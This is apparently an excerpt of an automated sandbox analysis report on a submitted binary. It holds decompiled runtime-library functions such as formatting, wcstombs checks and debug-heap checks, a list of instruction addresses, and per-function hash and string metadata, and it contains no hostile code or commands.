    																					}
    																					L102:
    																					__edx =  *(__ebp - 0x480);
    																					__eax =  *( *(__ebp - 0x480)) & 0x0000ffff;
    																					if(( *( *(__ebp - 0x480)) & 0x0000ffff) == 0) {
    																						break;
    																					}
    																					L103:
    																					 *(__ebp - 0x480) =  *(__ebp - 0x480) + 2;
    																					 *(__ebp - 0x480) =  *(__ebp - 0x480) + 2;
    																				}
    																				L104:
    																				 *(__ebp - 0x480) =  *(__ebp - 0x480) -  *(__ebp - 4);
    																				__edx =  *(__ebp - 0x480) -  *(__ebp - 4) >> 1;
    																				 *(__ebp - 0x24) =  *(__ebp - 0x480) -  *(__ebp - 4) >> 1;
    																				goto L105;
    																			} else {
    																				L88:
    																				if( *(__ebp - 4) == 0) {
    																					__eax =  *0xd121a0; // 0xb775a0
    																					 *(__ebp - 4) = __eax;
    																				}
    																				__ecx =  *(__ebp - 4);
    																				 *(__ebp - 0x478) = __ecx;
    																				 *(__ebp - 0x24) = 0;
    																				while(1) {
    																					L92:
    																					__eax =  *(__ebp - 0x24);
    																					if( *(__ebp - 0x24) >=  *(__ebp - 0x47c)) {
    																						break;
    																					}
    																					L93:
    																					__ecx =  *(__ebp - 0x478);
    																					__edx =  *__ecx;
    																					if( *__ecx == 0) {
    																						break;
    																					}
    																					L94:
    																					__ecx = __ebp - 0x40;
    																					E00B7C680(__ebp - 0x40) =  *(__ebp - 0x478);
    																					__ecx =  *( *(__ebp - 0x478)) & 0x000000ff;
    																					if(E00B91090( *( *(__ebp - 0x478)) & 0x000000ff,  *(__ebp - 0x478)) != 0) {
    																						 *(__ebp - 0x478) =  *(__ebp - 0x478) + 1;
    																						 *(__ebp - 0x478) =  *(__ebp - 0x478) + 1;
    																					}
    																					 *(__ebp - 0x478) =  *(__ebp - 0x478) + 1;
    																					 *(__ebp - 0x478) =  *(__ebp - 0x478) + 1;
    																					 *(__ebp - 0x24) =  *(__ebp - 0x24) + 1;
    																					 *(__ebp - 0x24) =  *(__ebp - 0x24) + 1;
    																				}
    																				L97:
    																				L105:
    																				goto L187;
    																			}
    																		case 0xc:
    																			goto L0;
    																		case 0xd:
    																			L144:
    																			 *((intOrPtr*)(__ebp - 0x460)) = 0x27;
    																			L145:
    																			 *(__ebp - 8) = 0x10;
    																			 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000080;
    																			if(( *(__ebp - 0x10) & 0x00000080) != 0) {
    																				__edx = 0x30;
    																				 *((short*)(__ebp - 0x14)) = __dx;
    																				 *((intOrPtr*)(__ebp - 0x460)) =  *((intOrPtr*)(__ebp - 0x460)) + 0x51;
    																				 *(__ebp - 0x12) = __ax;
    																				 *(__ebp - 0x1c) = 2;
    																			}
    																			goto L150;
    																		case 0xe:
    																			goto L187;
    																	}
    																}
    															}
    														}
    													}
    												}
    											}
    										}
    									}
    								}
    							}
    						}
    					}
    				}
    			}




























    0x00b96a6d
    0x00b96a6d
    0x00b96a6d
    0x00b96a6d
    0x00b96a6d
    0x00000000
    0x00b96ae2
    0x00000000
    0x00b96ae2
    0x00000000
    0x00b96ae2
    0x00b96ae2
    0x00b96aea
    0x00b96b0c
    0x00b96b12
    0x00b96b37
    0x00b96b7e
    0x00b96b81
    0x00b96ba2
    0x00b96ba7
    0x00b96bac
    0x00b96bb2
    0x00b96b83
    0x00b96b87
    0x00b96b8c
    0x00b96b8f
    0x00b96b90
    0x00b96b96
    0x00b96b96
    0x00b96b39
    0x00b96b3c
    0x00b96b3f
    0x00b96b61
    0x00b96b66
    0x00b96b6c
    0x00b96b6d
    0x00b96b73
    0x00b96b41
    0x00b96b45
    0x00b96b4a
    0x00b96b4e
    0x00b96b4f
    0x00b96b55
    0x00b96b55
    0x00b96b79
    0x00b96b14
    0x00b96b18
    0x00b96b1d
    0x00b96b20
    0x00b96b26
    0x00b96b26
    0x00b96aec
    0x00b96af0
    0x00b96af5
    0x00b96af8
    0x00b96afe
    0x00b96afe
    0x00b96bbe
    0x00b96c00
    0x00b96c06
    0x00b96c12
    0x00000000
    0x00b96bc0
    0x00b96bc0
    0x00b96bc0
    0x00b96bc7
    0x00000000
    0x00b96bd4
    0x00b96bd4
    0x00b96be2
    0x00b96be7
    0x00b96bed
    0x00b96bfb
    0x00b96c18
    0x00b96c20
    0x00b96c42
    0x00b96c42
    0x00b96c4c
    0x00b96c5d
    0x00b96c67
    0x00b96c69
    0x00b96c69
    0x00b96c4e
    0x00b96c4e
    0x00b96c4e
    0x00b96c7c
    0x00b96c7e
    0x00b96c7e
    0x00b96c8b
    0x00b96c8e
    0x00b96c8e
    0x00b96c94
    0x00b96c97
    0x00b96c9c
    0x00000000
    0x00000000
    0x00b96cac
    0x00b96caf
    0x00b96cb9
    0x00b96cc8
    0x00b96cd1
    0x00b96ce7
    0x00b96ced
    0x00b96cfa
    0x00b96d08
    0x00b96d08
    0x00b96d17
    0x00b96d1f
    0x00b96d1f
    0x00b96d27
    0x00b96d30
    0x00b96d39
    0x00b96d45
    0x00b96d5e
    0x00b96d64
    0x00b96d6d
    0x00b96d6d
    0x00000000
    0x00b96d70
    0x00000000
    0x00b96d70
    0x00000000
    0x00b96d70
    0x00000000
    0x00b96d70
    0x00000000
    0x00b96d70
    0x00000000
    0x00b96d70
    0x00000000
    0x00b96d70
    0x00b96d70
    0x00b96d70
    0x00b96d74
    0x00b96f50
    0x00b96f54
    0x00b96f5c
    0x00b96f61
    0x00b96f64
    0x00b96f64
    0x00b96f6b
    0x00b96f6b
    0x00b960eb
    0x00b960f2
    0x00b960ff
    0x00b96104
    0x00000000
    0x00b96117
    0x00b96121
    0x00b96148
    0x00b9612f
    0x00b96140
    0x00b96140
    0x00b96121
    0x00b96152
    0x00b96158
    0x00b96164
    0x00b96167
    0x00b96175
    0x00b96178
    0x00b96185
    0x00b9622a
    0x00b96230
    0x00b9623d
    0x00000000
    0x00000000
    0x00b96243
    0x00b96249
    0x00000000
    0x00b96250
    0x00b96250
    0x00b9626a
    0x00b9626f
    0x00000000
    0x00000000
    0x00b96277
    0x00b96277
    0x00b9627e
    0x00b96281
    0x00b96284
    0x00b96287
    0x00b9628a
    0x00b9628d
    0x00b96290
    0x00b96297
    0x00b9629e
    0x00000000
    0x00000000
    0x00b962aa
    0x00b962aa
    0x00b962b1
    0x00b962bd
    0x00b962c0
    0x00b962cd
    0x00000000
    0x00000000
    0x00b962cf
    0x00b962d5
    0x00b962d5
    0x00b962dc
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00b96320
    0x00b96320
    0x00b9632a
    0x00b96357
    0x00b96361
    0x00b96361
    0x00b96365
    0x00b9632c
    0x00b9632c
    0x00b96338
    0x00b9633f
    0x00b96344
    0x00b96347
    0x00b9634a
    0x00b9634d
    0x00b9634f
    0x00b9634f
    0x00b96352
    0x00000000
    0x00000000
    0x00b9636d
    0x00b9636d
    0x00000000
    0x00000000
    0x00b96379
    0x00b96379
    0x00b96383
    0x00b963a3
    0x00b963a6
    0x00b963b0
    0x00b963b0
    0x00b963b4
    0x00b96385
    0x00b96385
    0x00b96391
    0x00b96398
    0x00b9639a
    0x00b9639a
    0x00b963a1
    0x00000000
    0x00000000
    0x00b963bc
    0x00b963bc
    0x00b963c3
    0x00b963cf
    0x00b963d2
    0x00b963df
    0x00b964f2
    0x00000000
    0x00b964f2
    0x00b963e5
    0x00b963eb
    0x00b963eb
    0x00b963f2
    0x00000000
    0x00b96429
    0x00b96429
    0x00b9642c
    0x00b96432
    0x00b96459
    0x00b96459
    0x00b9645c
    0x00b96462
    0x00b96486
    0x00b96486
    0x00b96489
    0x00b9648f
    0x00b964c8
    0x00b964d9
    0x00000000
    0x00b964d9
    0x00b96491
    0x00b96491
    0x00b96494
    0x00b9649a
    0x00000000
    0x00000000
    0x00b9649c
    0x00b9649c
    0x00b9649f
    0x00b964a5
    0x00000000
    0x00000000
    0x00b964a7
    0x00b964a7
    0x00b964aa
    0x00b964b0
    0x00000000
    0x00000000
    0x00b964b2
    0x00b964b2
    0x00b964b5
    0x00b964bb
    0x00000000
    0x00000000
    0x00b964bd
    0x00b964bd
    0x00b964c0
    0x00b964c6
    0x00b964ca
    0x00000000
    0x00b964ca
    0x00000000
    0x00b964c6
    0x00b96464
    0x00b96464
    0x00b96467
    0x00b9646e
    0x00000000
    0x00b96470
    0x00b96473
    0x00b96476
    0x00b9647c
    0x00b96481
    0x00000000
    0x00b96481
    0x00b9646e
    0x00b96434
    0x00b96434
    0x00b96437
    0x00b9643e
    0x00000000
    0x00b96440
    0x00b96443
    0x00b96446
    0x00b9644c
    0x00b96451
    0x00000000
    0x00b96451
    0x00000000
    0x00b964db
    0x00b964db
    0x00b964de
    0x00b964e1
    0x00000000
    0x00000000
    0x00b963f9
    0x00b963f9
    0x00b963fc
    0x00b96402
    0x00b9641e
    0x00b96421
    0x00b96404
    0x00b96404
    0x00b96407
    0x00b9640a
    0x00b96410
    0x00b96416
    0x00b96416
    0x00000000
    0x00000000
    0x00b964e6
    0x00b964e9
    0x00b964ef
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00b962f9
    0x00b962f9
    0x00b962fc
    0x00b962ff
    0x00000000
    0x00000000
    0x00b96304
    0x00b96307
    0x00b9630d
    0x00000000
    0x00000000
    0x00b962ee
    0x00b962f1
    0x00b962f4
    0x00000000
    0x00000000
    0x00b962e3
    0x00b962e6
    0x00b962e9
    0x00000000
    0x00000000
    0x00b96312
    0x00b96315
    0x00b96318
    0x00000000
    0x00000000
    0x00b9631b
    0x00000000
    0x00000000
    0x00b9618b
    0x00b9618b
    0x00b9618d
    0x00b9619b
    0x00b9618f
    0x00b9618f
    0x00b9618f
    0x00b961ab
    0x00b961b8
    0x00b961ba
    0x00b961bf
    0x00b961c1
    0x00b961c6
    0x00b961cb
    0x00b961cd
    0x00b961d2
    0x00b961d8
    0x00b961da
    0x00b961da
    0x00b961d8
    0x00b961db
    0x00b961e2
    0x00000000
    0x00b961e4
    0x00b961e9
    0x00b96205
    0x00b9620d
    0x00b9621a
    0x00b9621f
    0x00b97034
    0x00b97041
    0x00b97041
    0x00b961e2
    0x00b96185
    0x00b96f70
    0x00b96f77
    0x00b96f8e
    0x00b96f82
    0x00b96f82
    0x00b96f82
    0x00b96f98
    0x00b96f9e
    0x00b96fab
    0x00b96fad
    0x00b96fb2
    0x00b96fb4
    0x00b96fb9
    0x00b96fbe
    0x00b96fc0
    0x00b96fc5
    0x00b96fcb
    0x00b96fcd
    0x00b96fcd
    0x00b96fcb
    0x00b96fd5
    0x00b97020
    0x00b97029
    0x00b9702e
    0x00b96fd7
    0x00b96fdc
    0x00b96ff8
    0x00b97000
    0x00b9700d
    0x00b97012
    0x00b97012
    0x00000000
    0x00b96fd5
    0x00b96d7a
    0x00b96d80
    0x00b96d8a
    0x00b96da4
    0x00b96dbe
    0x00b96dc5
    0x00b96dc9
    0x00b96dc9
    0x00b96da6
    0x00b96dab
    0x00b96daf
    0x00b96daf
    0x00b96d8c
    0x00b96d91
    0x00b96d95
    0x00b96d95
    0x00b96d8a
    0x00b96dd9
    0x00b96de5
    0x00b96dfb
    0x00b96e00
    0x00b96e00
    0x00b96e16
    0x00b96e1b
    0x00b96e24
    0x00b96e42
    0x00b96e47
    0x00b96e47
    0x00b96e4e
    0x00b96f08
    0x00b96f1b
    0x00b96f20
    0x00000000
    0x00b96e5e
    0x00b96e5e
    0x00b96e61
    0x00b96e6a
    0x00b96e70
    0x00b96e70
    0x00b96e7f
    0x00b96e87
    0x00000000
    0x00000000
    0x00b96e89
    0x00b96e8c
    0x00b96eb1
    0x00b96eb6
    0x00b96eb9
    0x00b96ec6
    0x00b96ed4
    0x00b96ee7
    0x00b96eec
    0x00b96efb
    0x00000000
    0x00b96efb
    0x00b96ec8
    0x00b96ec8
    0x00000000
    0x00b96ec8
    0x00b96f06
    0x00b96f23
    0x00b96f2a
    0x00b96f48
    0x00b96f4d
    0x00b96f4d
    0x00000000
    0x00b96f2a
    0x00b964f7
    0x00b964f7
    0x00b964fe
    0x00b96504
    0x00b9650a
    0x00b9650d
    0x00b96513
    0x00b96520
    0x00b96526
    0x00b96526
    0x00b9652d
    0x00000000
    0x00b968b1
    0x00b968b1
    0x00b968bf
    0x00b968c2
    0x00000000
    0x00000000
    0x00b96534
    0x00b96537
    0x00b9653d
    0x00b96542
    0x00b96545
    0x00b96545
    0x00000000
    0x00000000
    0x00b9667a
    0x00b9667d
    0x00b96682
    0x00b96687
    0x00b9668a
    0x00b9668a
    0x00000000
    0x00000000
    0x00b96a7d
    0x00b96a7d
    0x00000000
    0x00000000
    0x00b965e4
    0x00b965e4
    0x00b965f0
    0x00b965fd
    0x00b9660b
    0x00b9660b
    0x00b96611
    0x00b96614
    0x00b96620
    0x00b96675
    0x00000000
    0x00b96675
    0x00b965ff
    0x00b965ff
    0x00b96609
    0x00b96625
    0x00b96628
    0x00b9662e
    0x00b96656
    0x00b9665d
    0x00b96663
    0x00b96666
    0x00b96669
    0x00b9666f
    0x00b96672
    0x00b96630
    0x00b96630
    0x00b96636
    0x00b96639
    0x00b9663c
    0x00b96642
    0x00b96645
    0x00b96648
    0x00b9664a
    0x00b9664d
    0x00b9664d
    0x00000000
    0x00b9662e
    0x00000000
    0x00000000
    0x00b968c9
    0x00b968cc
    0x00b968cf
    0x00b968d2
    0x00b968d8
    0x00b968db
    0x00b968e6
    0x00b968f1
    0x00b968f5
    0x00b9690c
    0x00b96913
    0x00b96915
    0x00b96915
    0x00b9691c
    0x00b96923
    0x00b96931
    0x00b96934
    0x00b96943
    0x00b9694a
    0x00b9695f
    0x00b9694c
    0x00b9694c
    0x00b9694f
    0x00b96955
    0x00b9695a
    0x00b9695a
    0x00b9694a
    0x00b96969
    0x00b9696c
    0x00b9696f
    0x00b96972
    0x00b96975
    0x00b96978
    0x00b9697e
    0x00b96984
    0x00b9698c
    0x00b9698d
    0x00b96990
    0x00b96991
    0x00b96994
    0x00b96995
    0x00b9699c
    0x00b9699d
    0x00b969a0
    0x00b969a1
    0x00b969a4
    0x00b969a5
    0x00b969ab
    0x00b969ac
    0x00b969bb
    0x00b969bd
    0x00b969c3
    0x00b969c8
    0x00b969d0
    0x00b969d8
    0x00b969d9
    0x00b969dc
    0x00b969dd
    0x00b969ec
    0x00b969ee
    0x00b969ee
    0x00b969f1
    0x00b969fb
    0x00b96a00
    0x00b96a06
    0x00b96a08
    0x00b96a10
    0x00b96a11
    0x00b96a14
    0x00b96a15
    0x00b96a23
    0x00b96a25
    0x00b96a25
    0x00b96a06
    0x00b96a28
    0x00b96a2b
    0x00b96a31
    0x00b96a36
    0x00b96a3b
    0x00b96a41
    0x00b96a44
    0x00b96a44
    0x00b96a47
    0x00b96a53
    0x00000000
    0x00b96a53
    0x00b968f7
    0x00b968f7
    0x00b96901
    0x00000000
    0x00000000
    0x00b96903
    0x00b96903
    0x00000000
    0x00b96903
    0x00b968e8
    0x00b968e8
    0x00000000
    0x00000000
    0x00b96548
    0x00b96548
    0x00b96553
    0x00b9655b
    0x00b96562
    0x00b96565
    0x00b96568
    0x00b965c8
    0x00b9656a
    0x00b96571
    0x00b96577
    0x00b9657d
    0x00b96584
    0x00b96587
    0x00b9658d
    0x00b96595
    0x00b96597
    0x00b9659e
    0x00b965a5
    0x00b965b6
    0x00b965b8
    0x00b965b8
    0x00b965bf
    0x00b965cf
    0x00b965d5
    0x00b965d8
    0x00000000
    0x00000000
    0x00b96a5b
    0x00b96a5e
    0x00b96a61
    0x00b96a64
    0x00000000
    0x00000000
    0x00b967ba
    0x00b967ba
    0x00b967c6
    0x00b967d3
    0x00b9687d
    0x00b9687d
    0x00b96880
    0x00b96883
    0x00b96897
    0x00b9689d
    0x00b968a3
    0x00b96885
    0x00b96885
    0x00b9688b
    0x00b96892
    0x00b96892
    0x00b968a5
    0x00000000
    0x00b968a5
    0x00b967d9
    0x00b967d9
    0x00b967db
    0x00b967e9
    0x00b967dd
    0x00b967dd
    0x00b967dd
    0x00b967f3
    0x00b967f9
    0x00b96806
    0x00b96808
    0x00b9680d
    0x00b9680f
    0x00b96814
    0x00b96819
    0x00b9681b
    0x00b96820
    0x00b96826
    0x00b96828
    0x00b96828
    0x00b96826
    0x00b96830
    0x00b96878
    0x00000000
    0x00b96832
    0x00b96832
    0x00b96837
    0x00b96853
    0x00b9685b
    0x00b96865
    0x00b96868
    0x00b9686d
    0x00000000
    0x00b9686d
    0x00000000
    0x00b96ac4
    0x00b96ac4
    0x00b96ace
    0x00b96ad4
    0x00b96ad9
    0x00b96adf
    0x00b96adf
    0x00000000
    0x00000000
    0x00b96a76
    0x00b96a76
    0x00000000
    0x00000000
    0x00b9668d
    0x00b96691
    0x00b9669f
    0x00b966a2
    0x00b96693
    0x00b96693
    0x00b96693
    0x00b966a8
    0x00b966ae
    0x00b966b4
    0x00b966c0
    0x00b966c6
    0x00b966c9
    0x00b96751
    0x00b96755
    0x00b96757
    0x00b9675d
    0x00b9675d
    0x00b96760
    0x00b96767
    0x00b9676a
    0x00b96770
    0x00b96770
    0x00b96770
    0x00b96776
    0x00b9677c
    0x00b9677f
    0x00b96787
    0x00000000
    0x00000000
    0x00b96789
    0x00b96789
    0x00b9678f
    0x00b96794
    0x00000000
    0x00000000
    0x00b96796
    0x00b9679c
    0x00b9679f
    0x00b9679f
    0x00b967a7
    0x00b967ad
    0x00b967b0
    0x00b967b2
    0x00000000
    0x00b966cf
    0x00b966cf
    0x00b966d3
    0x00b966d5
    0x00b966da
    0x00b966da
    0x00b966dd
    0x00b966e0
    0x00b966e6
    0x00b966f8
    0x00b966f8
    0x00b966f8
    0x00b96701
    0x00000000
    0x00000000
    0x00b96703
    0x00b96703
    0x00b96709
    0x00b9670e
    0x00000000
    0x00000000
    0x00b96710
    0x00b96710
    0x00b96719
    0x00b9671f
    0x00b9672d
    0x00b96735
    0x00b96738
    0x00b96738
    0x00b96744
    0x00b96747
    0x00b966f2
    0x00b966f5
    0x00b966f5
    0x00b9674f
    0x00b967b5
    0x00000000
    0x00b967b5
    0x00000000
    0x00000000
    0x00000000
    0x00b96a89
    0x00b96a89
    0x00b96a93
    0x00b96a93
    0x00b96a9d
    0x00b96aa3
    0x00b96aa5
    0x00b96aaa
    0x00b96ab4
    0x00b96ab7
    0x00b96abb
    0x00b96abb
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00b9652d
    0x00b96d70
    0x00b96d70
    0x00b96d70
    0x00b96d70
    0x00b96d70
    0x00b96d70
    0x00b96d70
    0x00b96bc7
    0x00b96bbe
    0x00b96ae2
    0x00b96ae2
    0x00b96ae2

    APIs
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.638265274.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true
    • Associated: 00000000.00000002.638237207.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.638841801.0000000000D11000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.638905915.0000000000D16000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b70000_SecuriteInfo.jbxd
    Similarity
    • API ID: _get_int64_arg$__aulldiv__aullrem
    • String ID: 9
    • API String ID: 2124759748-2366072709
    • Opcode ID: e0e3f8e1386be92e0bc5f3dd4c91d705f34ce2870048e1cdee0c56fa3a087290
    • Instruction ID: 371f0942eba5da7b012e7b8c73e40f9b1e48c007c8288a6c4445f0bb4bd8b235
    • Opcode Fuzzy Hash: e0e3f8e1386be92e0bc5f3dd4c91d705f34ce2870048e1cdee0c56fa3a087290
    • Instruction Fuzzy Hash: 5F41C2B1E105299FDF24CF58C981B9EB7B5FB86314F1041E8E189AB241D7309A80CF59
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.638265274.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true
    • Associated: 00000000.00000002.638237207.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.638841801.0000000000D11000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.638905915.0000000000D16000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b70000_SecuriteInfo.jbxd
    Similarity
    • API ID: _get_int64_arg$__aulldiv__aullrem
    • String ID: 9
    • API String ID: 2124759748-2366072709
    • Opcode ID: 51d0f5c37f6f4eca2bdb9232f71b3a2a9497eb3c88c380f7a17efa34b083e1d1
    • Instruction ID: cd05cf53293981f902fe771f56f44ef037fee2bfffe8f21c04f3962e3bdd5dde
    • Opcode Fuzzy Hash: 51d0f5c37f6f4eca2bdb9232f71b3a2a9497eb3c88c380f7a17efa34b083e1d1
    • Instruction Fuzzy Hash: DE419BB1D15A28DFEF25CB58C889BAEB7F5FB84300F2485E9E449A6240D7349A81CF50
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • __invalid_parameter.LIBCMTD ref: 00B92C9B
    Strings
    • _wcstombs_s_l, xrefs: 00B92C91
    • (dst != NULL && sizeInBytes > 0) || (dst == NULL && sizeInBytes == 0), xrefs: 00B92C53, 00B92C96
    • f:\dd\vctools\crt_bld\self_x86\crt\src\wcstombs.c, xrefs: 00B92C5F, 00B92C8C
    Memory Dump Source
    • Source File: 00000000.00000002.638265274.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true
    • Associated: 00000000.00000002.638237207.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.638841801.0000000000D11000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.638905915.0000000000D16000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b70000_SecuriteInfo.jbxd
    Similarity
    • API ID: __invalid_parameter
    • String ID: (dst != NULL && sizeInBytes > 0) || (dst == NULL && sizeInBytes == 0)$_wcstombs_s_l$f:\dd\vctools\crt_bld\self_x86\crt\src\wcstombs.c
    • API String ID: 3730194576-625432840
    • Opcode ID: d36fd7684db733780b1e5a443dd76ea3186cbcb95e20d7f97b751a80e99fd7d7
    • Instruction ID: bdd3b010eff838d43bebbdee1002bab711261b25357e7ff1804a851d0491c059
    • Opcode Fuzzy Hash: d36fd7684db733780b1e5a443dd76ea3186cbcb95e20d7f97b751a80e99fd7d7
    • Instruction Fuzzy Hash: DA011D70D84309AAEF246F84CC067AE72F0EB11709F1045E5F834251E2D7F55A84CB95
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • __invalid_parameter.LIBCMTD ref: 00B927A7
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.638265274.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true
    • Associated: 00000000.00000002.638237207.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.638841801.0000000000D11000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.638905915.0000000000D16000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b70000_SecuriteInfo.jbxd
    Similarity
    • API ID: __invalid_parameter
    • String ID: _wcstombs_l_helper$f:\dd\vctools\crt_bld\self_x86\crt\src\wcstombs.c$pwcs != NULL
    • API String ID: 3730194576-2632876063
    • Opcode ID: 8fbcafd95ad51696a1d4da6dc29f39a687111b741b69e3bbd7e338f156b87b15
    • Instruction ID: e1f0428c9b5503ef1cd42d892b60fbf2b400c7fb243439b3fc8b88b1e5a0bde4
    • Opcode Fuzzy Hash: 8fbcafd95ad51696a1d4da6dc29f39a687111b741b69e3bbd7e338f156b87b15
    • Instruction Fuzzy Hash: 45F0C230ED4208BADF306FA4CC87B5A32D0AB11754F1046E4F83A350D3DBB58D448A61
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    Memory Dump Source
    • Source File: 00000000.00000002.638265274.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true
    • Associated: 00000000.00000002.638237207.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.638841801.0000000000D11000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.638905915.0000000000D16000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b70000_SecuriteInfo.jbxd
    Similarity
    • API ID: Locale__wchartodigit$UpdateUpdate::~___aulldiv__aullrem
    • String ID:
    • API String ID: 1881694700-0
    • Opcode ID: 47a29d47f524797e89d580dd49d6f33ce3b065494711cdebf48fc32b14daa585
    • Instruction ID: c1a88985fe541565950586ce350b59811f52f3a2df3619122d45438a962a97a6
    • Opcode Fuzzy Hash: 47a29d47f524797e89d580dd49d6f33ce3b065494711cdebf48fc32b14daa585
    • Instruction Fuzzy Hash: 9131E3B090421E9BCF14DF98D881ABEBBF1FF49315F20865EE429A7394E7349940CB91
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • __encode_pointer.LIBCMTD ref: 00B84C87
      • Part of subcall function 00B849C0: TlsGetValue.KERNEL32(00000001,00B84C36,D1E0EB39), ref: 00B849D5
      • Part of subcall function 00B849C0: TlsGetValue.KERNEL32(00000001,00000001), ref: 00B849F6
      • Part of subcall function 00B849C0: __crt_wait_module_handle.LIBCMTD ref: 00B84A0C
      • Part of subcall function 00B849C0: GetProcAddress.KERNEL32(00000000,DecodePointer), ref: 00B84A26
    • __mtterm.LIBCMTD ref: 00B84C95
    • __initptd.LIBCMTD ref: 00B84CA4
    • GetCurrentThreadId.KERNEL32 ref: 00B84CAC
    Memory Dump Source
    • Source File: 00000000.00000002.638265274.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true
    • Associated: 00000000.00000002.638237207.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.638841801.0000000000D11000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.638905915.0000000000D16000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b70000_SecuriteInfo.jbxd
    Similarity
    • API ID: Value$AddressCurrentProcThread__crt_wait_module_handle__encode_pointer__initptd__mtterm
    • String ID:
    • API String ID: 1673568325-0
    • Opcode ID: 6ac6bbd80c70dbc2803d8ab68ec3a11c44c17d5502cf6a1be652440d47af43df
    • Instruction ID: 841fcf3713a51ccd2b063c26184b5dd756f82cc7b96d8ef49db108faf6dfea8c
    • Opcode Fuzzy Hash: 6ac6bbd80c70dbc2803d8ab68ec3a11c44c17d5502cf6a1be652440d47af43df
    • Instruction Fuzzy Hash: 22F030B5A01206ABC710EFA8E84579EBBB9EB48314F1086D4E905973A1EB32D591CB61
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    Strings
    • _CrtCheckMemory(), xrefs: 00B7EBD8
    • f:\dd\vctools\crt_bld\self_x86\crt\src\dbgheap.c, xrefs: 00B7EBE4
    Memory Dump Source
    • Source File: 00000000.00000002.638265274.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true
    • Associated: 00000000.00000002.638237207.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.638841801.0000000000D11000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.638905915.0000000000D16000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b70000_SecuriteInfo.jbxd
    Similarity
    • API ID: CheckMemory
    • String ID: _CrtCheckMemory()$f:\dd\vctools\crt_bld\self_x86\crt\src\dbgheap.c
    • API String ID: 2067751306-2660621803
    • Opcode ID: daa4da346bb671c20c78026f7b17eb87996b4473e7721708d621848ba69a90e0
    • Instruction ID: b5d16c37cebfe92c2b2f5f2ccf4e0828702062daf54fdac5f9b7c985919afb2e
    • Opcode Fuzzy Hash: daa4da346bb671c20c78026f7b17eb87996b4473e7721708d621848ba69a90e0
    • Instruction Fuzzy Hash: DBF0E574580300A7CA20CF6CDC9277932D8EB04315F10C4D9E63E99392EA72D4658B62
    Uniqueness

    Uniqueness Score: -1.00%